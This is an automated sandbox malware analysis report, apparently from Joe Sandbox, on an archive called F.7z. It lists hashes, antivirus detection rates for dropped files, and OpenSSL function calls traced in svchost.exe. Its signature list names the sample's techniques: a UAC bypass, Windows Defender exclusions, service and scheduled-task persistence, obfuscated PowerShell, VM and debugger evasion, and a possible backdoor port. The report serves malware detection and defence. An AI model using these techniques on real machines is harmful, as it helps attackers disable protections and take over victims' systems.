Windows Analysis Report
F.7z

Overview

General Information

Sample name: F.7z
Analysis ID: 1501605
MD5: 5132591a35248a8d71171cb5f4343334
SHA1: 78a0c5b34c107a68cad2d36424a6efbffac11412
SHA256: ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat Virustotal: Detection: 41%
Source: C:\Windows \System32\x249569.dat ReversingLabs: Detection: 54%
Source: C:\Windows \System32\x249569.dat Virustotal: Detection: 41%
Source: C:\Windows\System32\console_zero.exe ReversingLabs: Detection: 75%
Source: C:\Windows\System32\console_zero.exe Virustotal: Detection: 71%
Source: C:\Windows\System32\usvc.dat ReversingLabs: Detection: 95%
Source: C:\Windows\System32\usvc.dat Virustotal: Detection: 56%
Source: C:\Windows\System32\x338625.dat ReversingLabs: Detection: 79%
Source: F.7z ReversingLabs: Detection: 27%
Source: F.7z Virustotal: Detection: 31%
Source: C:\Windows\System32\x338625.dat Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44260
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 46_2_00007FFA2CE3E220
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE621E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl, 46_2_00007FFA2CE621E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE381E0 CRYPTO_get_ex_data, 46_2_00007FFA2CE381E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7A1D0 CRYPTO_realloc, 46_2_00007FFA2CE7A1D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug, 46_2_00007FFA2CE90340
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE54330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE54330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE5A330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE3A330
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE822F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE822F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA82E7
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8A2E0 RAND_bytes_ex,CRYPTO_malloc,memset, 46_2_00007FFA2CE8A2E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE342D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE342D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE6A2C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4C2C0 CRYPTO_free, 46_2_00007FFA2CE4C2C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE262C0 CRYPTO_clear_free, 46_2_00007FFA2CE262C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA02C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE44490
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE62470 CRYPTO_zalloc, 46_2_00007FFA2CE62470
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free, 46_2_00007FFA2CE22460
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free, 46_2_00007FFA2CEA4460
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE40450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 46_2_00007FFA2CE40450
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA844C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free, 46_2_00007FFA2CEA8426
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 46_2_00007FFA2CEA8414
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE58400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf, 46_2_00007FFA2CE58400
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE623F0 CRYPTO_free, 46_2_00007FFA2CE623F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE223C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE223C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE25DB0 CRYPTO_malloc, 46_2_00007FFA2CE25DB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE9BDB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE99DA6
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27DA0 CRYPTO_free, 46_2_00007FFA2CE27DA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free, 46_2_00007FFA2CE43D70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6BD60 CRYPTO_zalloc, 46_2_00007FFA2CE6BD60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75D30 CRYPTO_free, 46_2_00007FFA2CE75D30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49CC0 EVP_MAC_CTX_free,CRYPTO_free, 46_2_00007FFA2CE49CC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy, 46_2_00007FFA2CE99CC1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4DEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free, 46_2_00007FFA2CE4DEA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87E90 CRYPTO_malloc,COMP_expand_block, 46_2_00007FFA2CE87E90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE95E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE95E80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61E70 CRYPTO_realloc, 46_2_00007FFA2CE61E70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE59E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE59E60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43E50 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE43E50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE75E20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73E10 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE73E10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE2DE10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free, 46_2_00007FFA2CE49E00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8DDE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE55FA0 CRYPTO_realloc, 46_2_00007FFA2CE55FA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEABFA0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,EVP_PKEY_derive_set_peer,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free, 46_2_00007FFA2CEABFA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29F90 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 46_2_00007FFA2CE29F90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DF70 CRYPTO_malloc,BIO_snprintf, 46_2_00007FFA2CE2DF70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE49F30 OSSL_PROVIDER_do_all,CRYPTO_malloc,memcpy, 46_2_00007FFA2CE49F30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91F30 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE91F30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43F00 CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE43F00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE77EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE77EC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21EC0 CRYPTO_free, 46_2_00007FFA2CE21EC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 46_2_00007FFA2CE90070
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44060 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE44060
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4A030 OSSL_PROVIDER_do_all,CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid, 46_2_00007FFA2CE4A030
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE60010 CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_free, 46_2_00007FFA2CE60010
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE62000 CRYPTO_free, 46_2_00007FFA2CE62000
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2BFF0 CRYPTO_THREAD_run_once, 46_2_00007FFA2CE2BFF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE87FE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE6FFD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE999B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE999B3
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE619A0 CRYPTO_malloc, 46_2_00007FFA2CE619A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 46_2_00007FFA2CE9999C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 46_2_00007FFA2CE99985
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE31950 CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE31950
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE87920
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE718E9 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE718E9
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE818D0 CRYPTO_free, 46_2_00007FFA2CE818D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE578D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE578D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE5B8D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE938C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE938C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B8C0 CRYPTO_free, 46_2_00007FFA2CE8B8C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE3DAA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 46_2_00007FFA2CE9BAA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE33A70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43A70 CRYPTO_get_ex_data, 46_2_00007FFA2CE43A70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61A60 CRYPTO_free, 46_2_00007FFA2CE61A60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free, 46_2_00007FFA2CE2DA50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7DA40 CRYPTO_memcmp, 46_2_00007FFA2CE7DA40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE29A20
